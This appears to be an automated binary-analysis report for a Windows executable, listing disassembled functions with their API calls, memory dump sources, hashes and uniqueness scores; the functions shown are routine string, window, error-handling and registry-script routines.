                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$String$AllocFree
                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                          • API String ID: 4249169437-4289949731
                                                                                                                                                                          • Opcode ID: 6ff6ec95346459992305f47ddfd717211c53b66e08d97a7e26ca94ea63ab3ae9
                                                                                                                                                                          • Instruction ID: 70b84ee266a2cbf4c985e55c222f57e4f033121a581e4cef1a1764262f86ccb9
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff6ec95346459992305f47ddfd717211c53b66e08d97a7e26ca94ea63ab3ae9
                                                                                                                                                                          • Instruction Fuzzy Hash: CED15E71600609DBCB24CF58C9C09ABB7BAFF84344B60452FE845EB291DB34E955CFA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045D6C6, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 208stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000), ref: 0045D739
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0045D75A
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000), ref: 0045D761
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000,00000001,00000080), ref: 0045D785
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$lstrcpy
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 805584807-2766056989
                                                                                                                                                                          • Opcode ID: efb52d490be84181593167a8a9da440600a26344edb73d9293c253071d747b6e
                                                                                                                                                                          • Instruction ID: 3de53bd4e4ecc56c741bd26d0c3f7c7757c97541d703d5faaf0591a96d08a574
                                                                                                                                                                          • Opcode Fuzzy Hash: efb52d490be84181593167a8a9da440600a26344edb73d9293c253071d747b6e
                                                                                                                                                                          • Instruction Fuzzy Hash: A661D971A00701AFDB24AF35DD45A6BB7E9FF58311F10442FF916CA2A2D7B8E8458B14
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045CF2B, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 161stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpylstrlen$ErrorH_prolog3Lastlstrcatlstrcmpi
                                                                                                                                                                          • String ID: <$GET
                                                                                                                                                                          • API String ID: 152113618-427699995
                                                                                                                                                                          • Opcode ID: 27029d674820e59922f9f4015c14c1226eb06f24b7722a46006542cdbed968b7
                                                                                                                                                                          • Instruction ID: e52956274272d6e8e42f414706c65881279229233ed1fb1e4674a811ce7c217a
                                                                                                                                                                          • Opcode Fuzzy Hash: 27029d674820e59922f9f4015c14c1226eb06f24b7722a46006542cdbed968b7
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B515072900119AFDF119FA0CC49DAF7F76FF08355F04802AFD059A2A2C7798956DB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041816C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00418173
                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,0000006C), ref: 004181A3
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004181B9
                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004181C9
                                                                                                                                                                          • EndPaint.USER32(?,?,?,00000000,00000000,00000000,?), ref: 004181F4
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00418202
                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00418259
                                                                                                                                                                          • GetClientRect.USER32 ref: 00418266
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000256), ref: 004182B4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$Paint$BeginClientH_prolog3_ProcRect
                                                                                                                                                                          • String ID: GIF
                                                                                                                                                                          • API String ID: 4259225933-881873598
                                                                                                                                                                          • Opcode ID: 15da5c69735f9710988cfd94195cc4744daaca479d16584ad1be54889e1725cf
                                                                                                                                                                          • Instruction ID: 4c19b9c84c2f87fb169aa2a797a20601ff5671a9506507150a35ece1f84cf339
                                                                                                                                                                          • Opcode Fuzzy Hash: 15da5c69735f9710988cfd94195cc4744daaca479d16584ad1be54889e1725cf
                                                                                                                                                                          • Instruction Fuzzy Hash: F641AF71800608EFDB11DFA5CD488AEBFB9FF04720B61426EF419A72A1CB348D91DB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045488A, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00454891
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 004549C7
                                                                                                                                                                            • Part of subcall function 00433B38: __EH_prolog3.LIBCMT ref: 00433B3F
                                                                                                                                                                            • Part of subcall function 00433B38: GetLastError.KERNEL32(00000004,0043383A,00000008,0043899A,0047C4E4,00000001,?,00000001), ref: 00433B58
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00454916
                                                                                                                                                                            • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104,00000078,00456C75,?,00000000,00000068,00427852,?,004A4D08,?,00000000,00000000,?), ref: 004548E9
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104,00000078,00456C75,?,00000000,00000068,00427852,?,004A4D08,?,00000000,00000000,?), ref: 0045495A
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$Directory$H_prolog3_StringWindows$AllocExceptionException@8H_prolog3RaiseSystemThrow
                                                                                                                                                                          • String ID: HsG$HsG$HsG$sysnative$syswow64
                                                                                                                                                                          • API String ID: 415710860-2517776981
                                                                                                                                                                          • Opcode ID: 2b211a3433428bb4333fac4bd38d443533f84c06f282d2bd9fd9a5dce169fe4e
                                                                                                                                                                          • Instruction ID: d15ac5da47158ecca3f87f32cae58966e706ce6ee751958ac037911233bd4b12
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b211a3433428bb4333fac4bd38d443533f84c06f282d2bd9fd9a5dce169fe4e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4841A070804248DEDB11EBF5C896BDDBBB4BF55308F5080AEE8457B292DB781A4CCB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404670, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,00000001,00000000,?,?,?,?,?,?,?,?,00000000,00471220,000000FF,HsG), ref: 004046C4
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00471220,000000FF,HsG), ref: 004046FA
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00471220,000000FF), ref: 00404745
                                                                                                                                                                          • SysFreeString.OLEAUT32(000000FF), ref: 00404761
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040476C
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040478C
                                                                                                                                                                          • SetLastError.KERNEL32(00000001), ref: 00404796
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG$m<H
                                                                                                                                                                          • API String ID: 2425351278-2845271504
                                                                                                                                                                          • Opcode ID: dc6672e3fd9f000d1fa6dec022e1f4b2a9c9f1e538307efbe58478d5671a344b
                                                                                                                                                                          • Instruction ID: ef2f39e1ee148b39ddc85385380774226a3b5f13eeb7e4b85cc314d68c39e3d0
                                                                                                                                                                          • Opcode Fuzzy Hash: dc6672e3fd9f000d1fa6dec022e1f4b2a9c9f1e538307efbe58478d5671a344b
                                                                                                                                                                          • Instruction Fuzzy Hash: 84413871900209EFDB00DFA9D944B9EBBF5FF08308F10412AE919E7751E735A910CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00460AB3, Relevance: 16.7, APIs: 11, Instructions: 185COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                                          • Opcode ID: 97dcc12bb1339235cbf6b2114ec48b24f0177d3ebe411fa9adeca378bdffe6ef
                                                                                                                                                                          • Instruction ID: c69340d1a4b1cb4af706e1d371d997e614cfaae12eb3648ef508158ae4ca9fbe
                                                                                                                                                                          • Opcode Fuzzy Hash: 97dcc12bb1339235cbf6b2114ec48b24f0177d3ebe411fa9adeca378bdffe6ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A51A2B1540202EFEF245F50D981D92BBF5EF28315F30095BE885DA142E7B9C995CB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00432404, Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 453stringregistryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,Delete,?,CC858012,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000), ref: 00432491
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?,?), ref: 004324A8
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,NoRemove,?,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?), ref: 00432598
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,Val,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?,?), ref: 004325C0
                                                                                                                                                                            • Part of subcall function 00431C81: CharNextW.USER32(?,?,00000000,?,?,?,?,0043131F,?,CC858012,?,?,?,?,?,0046C010), ref: 00431CBC
                                                                                                                                                                            • Part of subcall function 00431C81: CharNextW.USER32(?,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D42
                                                                                                                                                                            • Part of subcall function 00431C81: CharNextW.USER32(00000000,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431CD9
                                                                                                                                                                            • Part of subcall function 00431C81: CharNextW.USER32(00000000,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431CE7
                                                                                                                                                                            • Part of subcall function 00431C81: CharNextW.USER32(00000027,00000000,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D61
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,?,?,?), ref: 004326CF
                                                                                                                                                                            • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
                                                                                                                                                                            • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
                                                                                                                                                                            • Part of subcall function 00401410: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040144B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$lstrcmpi$AddressCloseDeleteHandleModuleProcValue
                                                                                                                                                                          • String ID: Delete$ForceRemove$NoRemove$Val
                                                                                                                                                                          • API String ID: 3600369491-1781481701
                                                                                                                                                                          • Opcode ID: 26f8775e148079aa73a4a649bd4ce4945ef95314761ed86a9722d58f0ed9fb76
                                                                                                                                                                          • Instruction ID: 6dc620b225dab416690d1ba2ee3c09ba26d4facdf7f075b6ae9faed6ab9836dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 26f8775e148079aa73a4a649bd4ce4945ef95314761ed86a9722d58f0ed9fb76
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF1E471D01225BADB35EB658D487AEB6B4AF18710F0051AFE805E7291DBB88F84CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405B10, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID: HsG$string too long
                                                                                                                                                                          • API String ID: 4104443479-1276652413
                                                                                                                                                                          • Opcode ID: 32e3f447df7f510110eb6fa2a6bcadc33ab4fdfe5dda07ae08fa81d5fe72df2b
                                                                                                                                                                          • Instruction ID: 6ae8a0eb024996b628e4143672ce806468e6e2847a17c5a84c499ac37f0afa9c
                                                                                                                                                                          • Opcode Fuzzy Hash: 32e3f447df7f510110eb6fa2a6bcadc33ab4fdfe5dda07ae08fa81d5fe72df2b
                                                                                                                                                                          • Instruction Fuzzy Hash: D8B1AF712087009BD720DF28D884B6BB7F9EF85314F100A2EF99997390D779E904CB9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00432D16, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 262COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00432D20
                                                                                                                                                                            • Part of subcall function 00430E88: __EH_prolog3.LIBCMT ref: 00430E8F
                                                                                                                                                                            • Part of subcall function 00431BAF: InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,00430DD6,?,?,00000000), ref: 00431BB4
                                                                                                                                                                            • Part of subcall function 00431BAF: GetLastError.KERNEL32(?,00430DD6,?,?,00000000), ref: 00431BBE
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00432DA2
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00432DFD
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00432EF2
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000A64), ref: 00432FD5
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00432F77
                                                                                                                                                                            • Part of subcall function 0043120B: __EH_prolog3.LIBCMT ref: 00431212
                                                                                                                                                                            • Part of subcall function 0043120B: EnterCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 0043122A
                                                                                                                                                                            • Part of subcall function 0043120B: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00431249
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Module$CriticalSection$FileH_prolog3H_prolog3_HandleName$CountEnterErrorInitializeLastLeaveSpin
                                                                                                                                                                          • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                          • API String ID: 3285820555-549000027
                                                                                                                                                                          • Opcode ID: b4654810c804767d57eaf1e49de16700a1fd3f673e0b84728613e4f7dc8649df
                                                                                                                                                                          • Instruction ID: ca5aa2f9cda23b11924902e025e0776929f6c6c72c98b7f39a012655aa67a053
                                                                                                                                                                          • Opcode Fuzzy Hash: b4654810c804767d57eaf1e49de16700a1fd3f673e0b84728613e4f7dc8649df
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA1C632A002299BDB20DB50CE51BEE7378AF09314F1455DBF909E3151D7B89F44CBAA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E5ED, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 247COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041E5F7
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
